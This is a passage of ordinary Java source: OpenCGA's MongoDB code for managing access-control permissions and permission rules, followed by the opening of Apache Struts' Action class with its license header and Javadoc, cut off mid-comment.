previously defined, it can be null the first time for (String memberPermission : aclList) { String[] split = StringUtils.splitByWholeSeparatorPreserveAllTokens(memberPermission, INTERNAL_DELIMITER, 2); // String[] split = memberPermission.split(INTERNAL_DELIMITER, 2); if (memberSet.isEmpty() || memberSet.contains(split[0])) { if (!permissions.get(QueryParams.ACL.key()).containsKey(split[0])) { permissions.get(QueryParams.ACL.key()).put(split[0], new ArrayList<>()); } if (!("NONE").equals(split[1])) { permissions.get(QueryParams.ACL.key()).get(split[0]).add(split[1]); } } } } List<String> userDefinedAcls = (List<String>) document.get(QueryParams.USER_DEFINED_ACLS.key()); if (userDefinedAcls != null) { // If _acl was not previously defined, it can be null the first time for (String memberPermission : userDefinedAcls) { String[] split = StringUtils.splitByWholeSeparatorPreserveAllTokens(memberPermission, INTERNAL_DELIMITER, 2); // String[] split = memberPermission.split(INTERNAL_DELIMITER, 2); if (memberSet.isEmpty() || memberSet.contains(split[0])) { if (!permissions.get(QueryParams.USER_DEFINED_ACLS.key()).containsKey(split[0])) { permissions.get(QueryParams.USER_DEFINED_ACLS.key()).put(split[0], new ArrayList<>()); } if (!("NONE").equals(split[1])) { permissions.get(QueryParams.USER_DEFINED_ACLS.key()).get(split[0]).add(split[1]); } } } } } return entryPermission; } class EntryPermission { /** * Entry id. */ private String id; /** * A map of [acl, user_defined_acl] -> user -> List of permissions. */ private Map<String, Map<String, List<String>>> permissions; EntryPermission() { this.permissions = new HashMap<>(); this.permissions.put(QueryParams.ACL.key(), new HashMap<>()); this.permissions.put(QueryParams.USER_DEFINED_ACLS.key(), new HashMap<>()); } private String getId() { return id; } private EntryPermission setId(String id) { this.id = id; return this; } private Map<String, Map<String, List<String>>> getPermissions() { return permissions; } private EntryPermission setPermissions(Map<String, Map<String, List<String>>> permissions) { this.permissions = permissions; return this; } } @Override public OpenCGAResult<Map<String, List<String>>> get(long resourceId, List<String> members, Enums.Resource entry) throws CatalogException { validateEntry(entry); long startTime = startQuery(); EntryPermission entryPermission = internalGet(resourceId, members, entry); Map<String, List<String>> myMap = entryPermission.getPermissions().get(QueryParams.ACL.key()); return endQuery(startTime, myMap.isEmpty() ? Collections.emptyList() : Collections.singletonList(myMap)); } @Override public OpenCGAResult<Map<String, List<String>>> get(List<Long> resourceIds, List<String> members, Enums.Resource entry) throws CatalogException { OpenCGAResult<Map<String, List<String>>> result = OpenCGAResult.empty(); for (Long resourceId : resourceIds) { OpenCGAResult<Map<String, List<String>>> tmpResult = get(resourceId, members, entry); result.append(tmpResult); if (tmpResult.getNumResults() == 0) { result.getResults().add(Collections.emptyMap()); } } return result; } @Override public OpenCGAResult removeFromStudy(long studyId, String member, Enums.Resource resource) throws CatalogException { validateEntry(resource); Document query = new Document() .append(PRIVATE_STUDY_UID, studyId); List<String> removePermissions = createPermissionArray(Arrays.asList(member), getFullPermissions(resource)); Document update = new Document("$pullAll", new Document() .append(QueryParams.ACL.key(), removePermissions) .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions) ); logger.debug("Remove all acls for entity {} for member {} in study {}. Query: {}, pullAll: {}", resource, member, studyId, query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); return new OpenCGAResult(dbCollectionMap.get(resource).update(query, update, new QueryOptions(MongoDBCollection.MULTI, true))); } @Override public OpenCGAResult setToMembers(long studyId, List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { return runTransaction(clientSession -> { long startTime = startQuery(); // We obtain which of those members are actually users to add them to the @members group automatically addToMembersGroupInStudy(studyId, members, clientSession); for (AuthorizationManager.CatalogAclParams aclParam : aclParams) { setToMembers(aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource(), clientSession); // We store that those members have internal permissions setMembersHaveInternalPermissionsDefined(studyId, members, aclParam.getPermissions(), aclParam.getResource().name(), clientSession); } return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null); }); } @Override public OpenCGAResult setToMembers(List<Long> studyIds, List<String> members, List<String> permissions) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { return runTransaction(clientSession -> { long startTime = startQuery(); for (Long studyId : studyIds) { addToMembersGroupInStudy(studyId, members, clientSession); } setToMembers(studyIds, members, permissions, Enums.Resource.STUDY, clientSession); return endWrite(startTime, 1, 1, null); }); } private void setToMembers(List<Long> resourceIds, List<String> members, List<String> permissionList, Enums.Resource resource, ClientSession clientSession) throws CatalogDBException { validateEntry(resource); MongoDBCollection collection = dbCollectionMap.get(resource); /* 1. We are going to try to remove all the permissions to those members in first instance */ // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains List<String> permissions = getFullPermissions(resource); permissions.add("NONE"); permissions = createPermissionArray(members, permissions); Document queryDocument = new Document() .append(PRIVATE_UID, new Document("$in", resourceIds)); Document update = new Document(QueryParams.ACL.key(), permissions); if (isPermissionRuleEntity(resource)) { update.put(QueryParams.USER_DEFINED_ACLS.key(), permissions); } update = new Document("$pullAll", update); logger.debug("Pull all acls: Query {}, PullAll {}, entity: {}", queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), resource); collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true)); /* 2. We now add the expected permissions to those members */ // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains permissions = new ArrayList<>(permissionList); permissions.add("NONE"); permissions = createPermissionArray(members, permissions); update = new Document(QueryParams.ACL.key(), new Document("$each", permissions)); if (isPermissionRuleEntity(resource)) { update.put(QueryParams.USER_DEFINED_ACLS.key(), new Document("$each", permissions)); } update = new Document("$addToSet", update); logger.debug("Add Acls (addToSet): Query {}, Push {}, entity: {}", queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), resource); collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true)); } @Override public OpenCGAResult addToMembers(long studyId, List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { return runTransaction(clientSession -> { long startTime = startQuery(); addToMembersGroupInStudy(studyId, members, clientSession); for (AuthorizationManager.CatalogAclParams aclParam : aclParams) { addToMembers(aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource(), clientSession); // We store that those members have internal permissions setMembersHaveInternalPermissionsDefined(studyId, members, aclParam.getPermissions(), aclParam.getResource().name(), clientSession); } return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null); }); } private void addToMembers(List<Long> resourceIds, List<String> members, List<String> permissionList, Enums.Resource resource, ClientSession clientSession) throws CatalogDBException { validateEntry(resource); MongoDBCollection collection = dbCollectionMap.get(resource); // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains List<String> permissions = new ArrayList<>(permissionList); permissions.add("NONE"); List<String> myPermissions = createPermissionArray(members, permissions); Document queryDocument = new Document() .append(PRIVATE_UID, new Document("$in", resourceIds)); Document update; if (isPermissionRuleEntity(resource)) { update = new Document("$addToSet", new Document() .append(QueryParams.ACL.key(), new Document("$each", myPermissions)) .append(QueryParams.USER_DEFINED_ACLS.key(), new Document("$each", myPermissions)) ); } else { update = new Document("$addToSet", new Document(QueryParams.ACL.key(), new Document("$each", myPermissions))); } logger.debug("Add Acls (addToSet): Query {}, Push {}", queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true)); } @Override public OpenCGAResult addToMembers(List<Long> studyIds, List<String> members, List<String> permissions) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { return runTransaction((clientSession) -> { long startTime = startQuery(); for (Long studyId : studyIds) { addToMembersGroupInStudy(studyId, members, clientSession); } addToMembers(studyIds, members, permissions, Enums.Resource.STUDY, clientSession); return endWrite(startTime, 1, 1, null); }); } private void addToMembersGroupInStudy(long studyId, List<String> members, ClientSession clientSession) throws CatalogDBException { // We obtain which of those members are actually users to add them to the @members group automatically List<String> userList = members.stream() .filter(member -> !member.startsWith("@")) .collect(Collectors.toList()); if (CollectionUtils.isNotEmpty(userList)) { // We first add the member to the @members group in case they didn't belong already dbAdaptorFactory.getCatalogStudyDBAdaptor().addUsersToGroup(studyId, CatalogAuthorizationManager.MEMBERS_GROUP, userList, clientSession); } } @Override public OpenCGAResult removeFromMembers(List<String> members, List<AuthorizationManager.CatalogAclParams> aclParams) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { return runTransaction(clientSession -> { long startTime = startQuery(); for (AuthorizationManager.CatalogAclParams aclParam : aclParams) { removeFromMembers(clientSession, aclParam.getIds(), members, aclParam.getPermissions(), aclParam.getResource()); } return endWrite(startTime, aclParams.get(0).getIds().size(), aclParams.get(0).getIds().size(), null); }); } private void removeFromMembers(ClientSession clientSession, List<Long> resourceIds, List<String> members, List<String> permissionList, Enums.Resource resource) throws CatalogDBException { validateEntry(resource); MongoDBCollection collection = dbCollectionMap.get(resource); List<String> permissions = permissionList; if (permissions == null || permissions.isEmpty()) { // We get all possible permissions those members will have to do a full reset permissions = getFullPermissions(resource); } List<String> removePermissions = createPermissionArray(members, permissions); Document queryDocument = new Document() .append(PRIVATE_UID, new Document("$in", resourceIds)); Document update; if (isPermissionRuleEntity(resource)) { update = new Document("$pullAll", new Document() .append(QueryParams.ACL.key(), removePermissions) .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions) ); } else { update = new Document("$pullAll", new Document(QueryParams.ACL.key(), removePermissions)); } logger.debug("Remove Acls (pullAll): Query {}, Pull {}", queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true)); } @Override public OpenCGAResult resetMembersFromAllEntries(long studyId, List<String> members) throws CatalogDBException, CatalogParameterException, CatalogAuthorizationException { if (members == null || members.isEmpty()) { throw new CatalogDBException("Missing 'members' array."); } return runTransaction(clientSession -> { long tmpStartTime = startQuery(); logger.debug("Resetting permissions of users '{}' for study '{}'", members, studyId); dbAdaptorFactory.getCatalogStudyDBAdaptor().checkId(clientSession, studyId); removePermissions(clientSession, studyId, members, Enums.Resource.COHORT); removePermissions(clientSession, studyId, members, Enums.Resource.FILE); removePermissions(clientSession, studyId, members, Enums.Resource.INDIVIDUAL); removePermissions(clientSession, studyId, members, Enums.Resource.JOB); removePermissions(clientSession, studyId, members, Enums.Resource.SAMPLE); removePermissions(clientSession, studyId, members, Enums.Resource.DISEASE_PANEL); removePermissions(clientSession, studyId, members, Enums.Resource.FAMILY); removePermissions(clientSession, studyId, members, Enums.Resource.CLINICAL_ANALYSIS); removeFromMembers(clientSession, Arrays.asList(studyId), members, null, Enums.Resource.STUDY); return endWrite(tmpStartTime, -1, -1, null); }); } // TODO: Make this method transactional @Override public OpenCGAResult<Map<String, List<String>>> setAcls(List<Long> resourceIds, Map<String, List<String>> acls, Enums.Resource resource) throws CatalogDBException { validateEntry(resource); MongoDBCollection collection = dbCollectionMap.get(resource); for (long resourceId : resourceIds) { // Get current permissions for resource and override with new ones set for members (already existing or not) Map<String, Map<String, List<String>>> currentPermissions = internalGet(resourceId, Collections.emptyList(), resource) .getPermissions(); for (Map.Entry<String, List<String>> entry : acls.entrySet()) { // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains List<String> permissions = new ArrayList<>(entry.getValue()); permissions.add("NONE"); currentPermissions.get(QueryParams.ACL.key()).put(entry.getKey(), permissions); currentPermissions.get(QueryParams.USER_DEFINED_ACLS.key()).put(entry.getKey(), permissions); } List<String> permissionArray = createPermissionArray(currentPermissions.get(QueryParams.ACL.key())); List<String> manualPermissionArray = createPermissionArray(currentPermissions.get(QueryParams.USER_DEFINED_ACLS.key())); Document queryDocument = new Document() .append(PRIVATE_UID, resourceId); Document update; if (isPermissionRuleEntity(resource)) { update = new Document("$set", new Document() .append(QueryParams.ACL.key(), permissionArray) .append(QueryParams.USER_DEFINED_ACLS.key(), manualPermissionArray)); } else { update = new Document("$set", new Document(QueryParams.ACL.key(), permissionArray)); } logger.debug("Set Acls (set): Query {}, Push {}", queryDocument.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); collection.update(queryDocument, update, new QueryOptions(MongoDBCollection.MULTI, true)); } return OpenCGAResult.empty(); } private void setMembersHaveInternalPermissionsDefined(long studyId, List<String> members, List<String> permissions, String entity, ClientSession clientSession) { // We only store if a member has internal permissions defined if it hasn't been given VIEW permission // if (permissions.contains("VIEW")) { // return; // } Document queryDocument = new Document() .append(PRIVATE_UID, studyId); Document addToSet = new Document(); for (String member : members) { addToSet.append(MEMBER_WITH_INTERNAL_ACL + "." + member, entity); } Document update = new Document("$addToSet", addToSet); MongoDBCollection collection = dbCollectionMap.get(Enums.Resource.STUDY); collection.update(clientSession, queryDocument, update, new QueryOptions()); } @Override public OpenCGAResult applyPermissionRules(long studyId, PermissionRule permissionRule, Enums.Entity entry) throws CatalogException { MongoDBCollection collection = dbCollectionMap.get(entry.getResource()); // We will apply the permission rules to all the entries matching the query defined in the permission rules that does not have // the permission rules applied yet Document rawQuery = new Document() .append(PRIVATE_STUDY_UID, studyId) .append(PERMISSION_RULES_APPLIED, new Document("$ne", permissionRule.getId())); Bson bson = parseQuery(permissionRule.getQuery(), rawQuery, entry.getResource()); // We add the NONE permission by default so when a user is removed some permissions (not reset), the NONE permission remains List<String> permissions = new ArrayList<>(permissionRule.getPermissions()); permissions.add("NONE"); List<String> myPermissions = createPermissionArray(permissionRule.getMembers(), permissions); Document update = new Document() .append("$addToSet", new Document() .append(QueryParams.ACL.key(), new Document("$each", myPermissions)) .append(PERMISSION_RULES_APPLIED, permissionRule.getId())); logger.debug("Apply permission rules: Query {}, Update {}", bson.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); return new OpenCGAResult(collection.update(bson, update, new QueryOptions("multi", true))); } //TODO: Make transactional ! @Override public OpenCGAResult removePermissionRuleAndRemovePermissions(Study study, String permissionRuleToDeleteId, Enums.Entity entry) throws CatalogException { // Prepare the permission rule list into a map of permissionRuleId - PermissionRule to make much easier the process Map<String, PermissionRule> permissionRuleMap = study.getPermissionRules().get(entry).stream() .collect(Collectors.toMap(PermissionRule::getId, p -> p)); PermissionRule permissionRuleToDelete = permissionRuleMap.get(permissionRuleToDeleteId); Set<String> permissionsToRemove = createPermissionArray(permissionRuleToDelete.getMembers(), permissionRuleToDelete.getPermissions()) .stream().collect(Collectors.toSet()); MongoDBCollection collection = dbCollectionMap.get(entry.getResource()); // Remove the __TODELETE tag... String permissionRuleId = permissionRuleToDeleteId.split(INTERNAL_DELIMITER)[0]; // 1. Get all the entries that have the permission rule to be removed applied Document query = new Document() .append(PRIVATE_STUDY_UID, study.getUid()) .append(PERMISSION_RULES_APPLIED, permissionRuleId); QueryOptions options = new QueryOptions(QueryOptions.INCLUDE, Arrays.asList(QueryParams.ACL.key(), QueryParams.USER_DEFINED_ACLS.key(), PERMISSION_RULES_APPLIED, PRIVATE_UID)); MongoDBIterator<Document> iterator = collection.iterator(query, options); while (iterator.hasNext()) { Document myDocument = iterator.next(); Set<String> effectivePermissions = new HashSet<>(); Set<String> manualPermissions = new HashSet<>(); Set<String> permissionRulesApplied = new HashSet<>(); List<String> currentAclList = (List) myDocument.get(QueryParams.ACL.key()); List<String> currentManualAclList = (List) myDocument.get(QueryParams.USER_DEFINED_ACLS.key()); List<String> currentPermissionRulesApplied = (List) myDocument.get(PERMISSION_RULES_APPLIED); // TODO: Control that if there are no more permissions set for a user or group, we should also remove the NONE permission // Remove permissions from the permission rule for (String permission : currentAclList) { if (!permissionsToRemove.contains(permission)) { effectivePermissions.add(permission); } } // Remove permissions from the permission rule from the internal manual permissions list if (currentManualAclList != null) { for (String permission : currentManualAclList) { if (!permissionsToRemove.contains(permission)) { manualPermissions.add(permission); } } } for (String tmpPermissionRuleId : currentPermissionRulesApplied) { // We apply the rest of permission rules except the one to be deleted if (!tmpPermissionRuleId.equals(permissionRuleId)) { PermissionRule tmpPermissionRule = permissionRuleMap.get(tmpPermissionRuleId); List<String> tmpPermissionList = new ArrayList<>(tmpPermissionRule.getPermissions()); tmpPermissionList.add("NONE"); List<String> permissionArray = createPermissionArray(tmpPermissionRule.getMembers(), tmpPermissionList); effectivePermissions.addAll(permissionArray); permissionRulesApplied.add(tmpPermissionRuleId); } } Document tmpQuery = new Document() .append(PRIVATE_UID, myDocument.get(PRIVATE_UID)) .append(PRIVATE_STUDY_UID, study.getUid()); Document update = new Document("$set", new Document() .append(QueryParams.ACL.key(), effectivePermissions) .append(QueryParams.USER_DEFINED_ACLS.key(), manualPermissions) .append(PERMISSION_RULES_APPLIED, permissionRulesApplied)); logger.debug("Remove permission rule id and permissions from {}: Query {}, Update {}", entry, tmpQuery.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); DataResult result = collection.update(tmpQuery, update, new QueryOptions("multi", true)); if (result.getNumUpdated() == 0) { throw new CatalogException("Could not update and remove permission rule from entry " + myDocument.get(PRIVATE_UID)); } } // 2. Remove the permission rule from the map in the study removeReferenceToPermissionRuleInStudy(study.getUid(), permissionRuleToDeleteId, entry); return OpenCGAResult.empty(); } @Override public OpenCGAResult removePermissionRuleAndRestorePermissions(Study study, String permissionRuleToDeleteId, Enums.Entity entry) throws CatalogException { // Prepare the permission rule list into a map of permissionRuleId - PermissionRule to make much easier the process Map<String, PermissionRule> permissionRuleMap = study.getPermissionRules().get(entry).stream() .collect(Collectors.toMap(PermissionRule::getId, p -> p)); PermissionRule permissionRuleToDelete = permissionRuleMap.get(permissionRuleToDeleteId); Set<String> permissionsToRemove = createPermissionArray(permissionRuleToDelete.getMembers(), permissionRuleToDelete.getPermissions()) .stream().collect(Collectors.toSet()); MongoDBCollection collection = dbCollectionMap.get(entry.getResource()); // Remove the __TODELETE tag... String permissionRuleId = permissionRuleToDeleteId.split(INTERNAL_DELIMITER)[0]; // 1. Get all the entries that have the permission rule to be removed applied Document query = new Document() .append(PRIVATE_STUDY_UID, study.getUid()) .append(PERMISSION_RULES_APPLIED, permissionRuleId); QueryOptions options = new QueryOptions(QueryOptions.INCLUDE, Arrays.asList(QueryParams.ACL.key(), QueryParams.USER_DEFINED_ACLS.key(), PERMISSION_RULES_APPLIED, PRIVATE_UID)); MongoDBIterator<Document> iterator = collection.iterator(query, options); while (iterator.hasNext()) { Document myDocument = iterator.next(); Set<String> effectivePermissions = new HashSet<>(); Set<String> permissionRulesApplied = new HashSet<>(); List<String> currentAclList = (List) myDocument.get(QueryParams.ACL.key()); List<String> currentManualAclList = (List) myDocument.get(QueryParams.USER_DEFINED_ACLS.key()); List<String> currentPermissionRulesApplied = (List) myDocument.get(PERMISSION_RULES_APPLIED); // TODO: Control that if there are no more permissions set for a user or group, we should also remove the NONE permission // Remove permissions from the permission rule for (String permission : currentAclList) { if (!permissionsToRemove.contains(permission)) { effectivePermissions.add(permission); } } // Restore manual permissions if (currentManualAclList != null) { for (String permission : currentManualAclList) { effectivePermissions.add(permission); } } for (String tmpPermissionRuleId : currentPermissionRulesApplied) { // We apply the rest of permission rules except the one to be deleted if (!tmpPermissionRuleId.equals(permissionRuleId)) { PermissionRule tmpPermissionRule = permissionRuleMap.get(tmpPermissionRuleId); List<String> tmpPermissionList = new ArrayList<>(tmpPermissionRule.getPermissions()); tmpPermissionList.add("NONE"); List<String> permissionArray = createPermissionArray(tmpPermissionRule.getMembers(), tmpPermissionList); effectivePermissions.addAll(permissionArray); permissionRulesApplied.add(tmpPermissionRuleId); } } Document tmpQuery = new Document() .append(PRIVATE_UID, myDocument.get(PRIVATE_UID)) .append(PRIVATE_STUDY_UID, study.getUid()); Document update = new Document("$set", new Document() .append(QueryParams.ACL.key(), effectivePermissions) .append(PERMISSION_RULES_APPLIED, permissionRulesApplied)); logger.debug("Remove permission rule id and restoring permissions from {}: Query {}, Update {}", entry, tmpQuery.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); DataResult result = collection.update(tmpQuery, update, new QueryOptions("multi", true)); if (result.getNumUpdated() == 0) { throw new CatalogException("Could not update and remove permission rule from entry " + myDocument.get(PRIVATE_UID)); } } // 2. Remove the permission rule from the map in the study removeReferenceToPermissionRuleInStudy(study.getUid(), permissionRuleToDeleteId, entry); return OpenCGAResult.empty(); } //TODO: Make transactional ! @Override public OpenCGAResult removePermissionRule(long studyId, String permissionRuleToDelete, Enums.Entity entry) throws CatalogException { // Remove the __TODELETE tag... String permissionRuleId = permissionRuleToDelete.split(INTERNAL_DELIMITER)[0]; Document query = new Document() .append(PRIVATE_STUDY_UID, studyId) .append(PERMISSION_RULES_APPLIED, permissionRuleId); Document update = new Document() .append("$pull", new Document(PERMISSION_RULES_APPLIED, permissionRuleId)); logger.debug("Remove permission rule id from all {} in study {}: Query {}, Update {}", entry, studyId, query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); MongoDBCollection collection = dbCollectionMap.get(entry.getResource()); DataResult result = collection.update(query, update, new QueryOptions("multi", true)); if (result.getNumUpdated() == 0) { throw new CatalogException("Could not remove permission rule id " + permissionRuleId + " from all " + entry); } // Remove the permission rule from the map in the study removeReferenceToPermissionRuleInStudy(studyId, permissionRuleToDelete, entry); return OpenCGAResult.empty(); } private boolean isPermissionRuleEntity(Enums.Resource resource) { if (Enums.Entity.CLINICAL_ANALYSES.getResource() == resource || Enums.Entity.COHORTS.getResource() == resource || Enums.Entity.FAMILIES.getResource() == resource || Enums.Entity.FILES.getResource() == resource || Enums.Entity.INDIVIDUALS.getResource() == resource || Enums.Entity.JOBS.getResource() == resource || Enums.Entity.SAMPLES.getResource() == resource) { return true; } return false; } private void removeReferenceToPermissionRuleInStudy(long studyId, String permissionRuleToDelete, Enums.Entity entry) throws CatalogException { Document query = new Document() .append(PRIVATE_UID, studyId) .append(StudyDBAdaptor.QueryParams.PERMISSION_RULES.key() + "." + entry + ".id", permissionRuleToDelete); Document update = new Document("$pull", new Document(StudyDBAdaptor.QueryParams.PERMISSION_RULES.key() + "." + entry, new Document("id", permissionRuleToDelete))); logger.debug("Remove permission rule from the study {}: Query {}, Update {}", studyId, query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()), update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry())); DataResult result = dbCollectionMap.get(Enums.Resource.STUDY).update(query, update, new QueryOptions("multi", true)); if (result.getNumUpdated() == 0) { throw new CatalogException("Could not remove permission rule " + permissionRuleToDelete + " from study " + studyId); } } private Bson parseQuery(Query query, Document rawQuery, Enums.Resource entry) throws CatalogException { switch (entry) { case COHORT: return dbAdaptorFactory.getCatalogCohortDBAdaptor().parseQuery(query, rawQuery); case INDIVIDUAL: return dbAdaptorFactory.getCatalogIndividualDBAdaptor().parseQuery(query, rawQuery); case JOB: return dbAdaptorFactory.getCatalogJobDBAdaptor().parseQuery(query, rawQuery, QueryOptions.empty()); case FILE: return dbAdaptorFactory.getCatalogFileDBAdaptor().parseQuery(query, rawQuery); case SAMPLE: return dbAdaptorFactory.getCatalogSampleDBAdaptor().parseQuery(query, rawQuery); case FAMILY: return dbAdaptorFactory.getCatalogFamilyDBAdaptor().parseQuery(query, rawQuery); case CLINICAL_ANALYSIS: return dbAdaptorFactory.getClinicalAnalysisDBAdaptor().parseQuery(query, rawQuery); default: throw new CatalogException("Unexpected parameter received. " + entry + " has been received."); } } private void removePermissions(ClientSession clientSession, long studyId, List<String> users, Enums.Resource resource) { List<String> permissions = getFullPermissions(resource); List<String> removePermissions = createPermissionArray(users, permissions); MongoDBCollection collection = dbCollectionMap.get(resource); Document queryDocument = new Document() .append(PRIVATE_STUDY_UID, studyId) .append(QueryParams.ACL.key(), new Document("$in", removePermissions)); Document update = new Document("$pullAll", new Document() .append(QueryParams.ACL.key(), removePermissions) .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions) ); collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true)); } private List<String> createPermissionArray(Map<String, List<String>> memberPermissionsMap) { List<String> myPermissions = new ArrayList<>(memberPermissionsMap.size() * 2); for (Map.Entry<String, List<String>> stringListEntry : memberPermissionsMap.entrySet()) { if (stringListEntry.getValue().isEmpty()) { stringListEntry.getValue().add("NONE"); } for (String permission : stringListEntry.getValue()) { myPermissions.add(stringListEntry.getKey() + INTERNAL_DELIMITER + permission); } } return myPermissions; } private List<String> createPermissionArray(List<String> members, List<String> permissions) { List<String> writtenPermissions; if (permissions.isEmpty()) { writtenPermissions = Arrays.asList("NONE"); } else { writtenPermissions = permissions; } List<String> myPermissions = new ArrayList<>(members.size() * writtenPermissions.size()); for (String member : members) { for (String writtenPermission : writtenPermissions) { myPermissions.add(member + INTERNAL_DELIMITER + writtenPermission); } } return myPermissions; } }
/* * $Id: Action.java 526638 2007-04-09 03:02:03Z pbenedict $ * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.struts.action; import org.apache.struts.Globals; import org.apache.struts.config.ModuleConfig; import org.apache.struts.util.MessageResources; import org.apache.struts.util.ModuleUtils; import org.apache.struts.util.RequestUtils; import org.apache.struts.util.TokenProcessor; import javax.servlet.ServletContext; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import java.util.Locale; /** * <p>An <strong>Action</strong> is an adapter between the contents of an * incoming HTTP request and the corresponding business logic that should be * executed to process this request. The controller (RequestProcessor) will * select an appropriate Action for each request, create an instance (if * necessary), and call the <code>execute</code> method.</p> * * <p>Actions must be programmed in a thread-safe manner, because the * controller will share the same instance for multiple simultaneous requests. * This means you should design with the following items in mind: </p> * * <ul> * * <li>Instance and static variables MUST NOT be used to store information * related to the state of a particular request. They MAY be used to share * global resources across requests for the same action.</li> * * <li>Access to other resources (JavaBeans, session variables, etc.) MUST be * synchronized if those resources require protection. (Generally, however, * resource classes should be designed to provide their own protection where * necessary.</li> * * </ul> * * <p>When an <code>Action</code> instance is first created, the controller * will call <code>setServlet</code> with a non-null argument to identify the * servlet instance to which this Action is attached. When the servlet is to * be shut down (or restarted), the <code>setServlet</code> method will be * called with a <code>null</code> argument, which can be used to clean up any * allocated resources in use by this Action.</p> * * @version $Rev: 526638 $ $Date: 2005-08-26 21:58:39 -0400 (Fri, 26 Aug 2005) * $ */ public class Action { /** * <p>An instance of <code>TokenProcessor</code> to use for token * functionality.</p> */ private static TokenProcessor token = TokenProcessor.getInstance(); /** * The action execution was a failure. Show an error view, possibly asking * the user to retry entering data. * * @since Struts 1.4 */ public static final String ERROR = "error"; /** * The action execution require more input in order to succeed. This * result is typically used if a form handling action has been executed * so as to provide defaults for a form. The form associated with the * handler should be shown to the end user. * <p> * This result is also used if the given input params are invalid, * meaning the user should try providing input again. * * @since Struts 1.4 */ public static final String INPUT = "input"; /** * The action could not execute, since the user most was not logged in. * The login view should be shown. * * @since Struts 1.4 */ public static final String LOGIN = "login"; /** * The action execution was successful. Show result view to the end user. * * @since Struts 1.4 */ public static final String SUCCESS = "success"; // NOTE: We can make the tken variable protected and remove Action's // token methods or leave it private and allow the token methods to // delegate their calls. // ----------------------------------------------------- Instance Variables /** * <p>The servlet to which we are attached.</p> */ protected transient ActionServlet servlet = null; // ------------------------------------------------------------- Properties /** * <p>Return the servlet instance to which we are attached.</p> * * @return The servlet instance to which we are attached. */ public ActionServlet getServlet() { return (this.servlet); } /** * <p>Set the servlet instance to which we are attached (if * <code>servlet</code> is non-null), or release any allocated resources * (if <code>servlet</code> is null).</p> * * @param servlet The new controller servlet, if any */ public void setServlet(ActionServlet servlet) { this.servlet = servlet; // :FIXME: Is this suppose to release resources? } // --------------------------------------------------------- Public Methods /** * <p>Process the specified non-HTTP request, and create the corresponding * non-HTTP response (or forward to another web component that will create * it), with provision for handling exceptions thrown by the business * logic. Return an {@link ActionForward} instance describing where and * how control should be forwarded, or <code>null</code> if the response * has already been completed.</p> * * <p>The default implementation attempts to forward to the HTTP version * of this method.</p> * * @param mapping The ActionMapping used to select this instance * @param form The optional ActionForm bean for this request (if any) * @param request The non-HTTP request we are processing * @param response The non-HTTP response we are creating * @return The forward to which control should be transferred, or * <code>null</code> if the response has been completed. * @throws Exception if the application business logic throws an * exception. * @since Struts 1.1 */ public ActionForward execute(ActionMapping mapping, ActionForm form, ServletRequest request, ServletResponse response) throws Exception { try { return execute(mapping, form, (HttpServletRequest) request, (HttpServletResponse) response); } catch (ClassCastException e) { return null; } } /** * <p>Process the specified HTTP request, and create the corresponding * HTTP response (or forward to another web component that will create * it), with provision for handling exceptions thrown by the business * logic. Return an {@link ActionForward} instance describing where and * 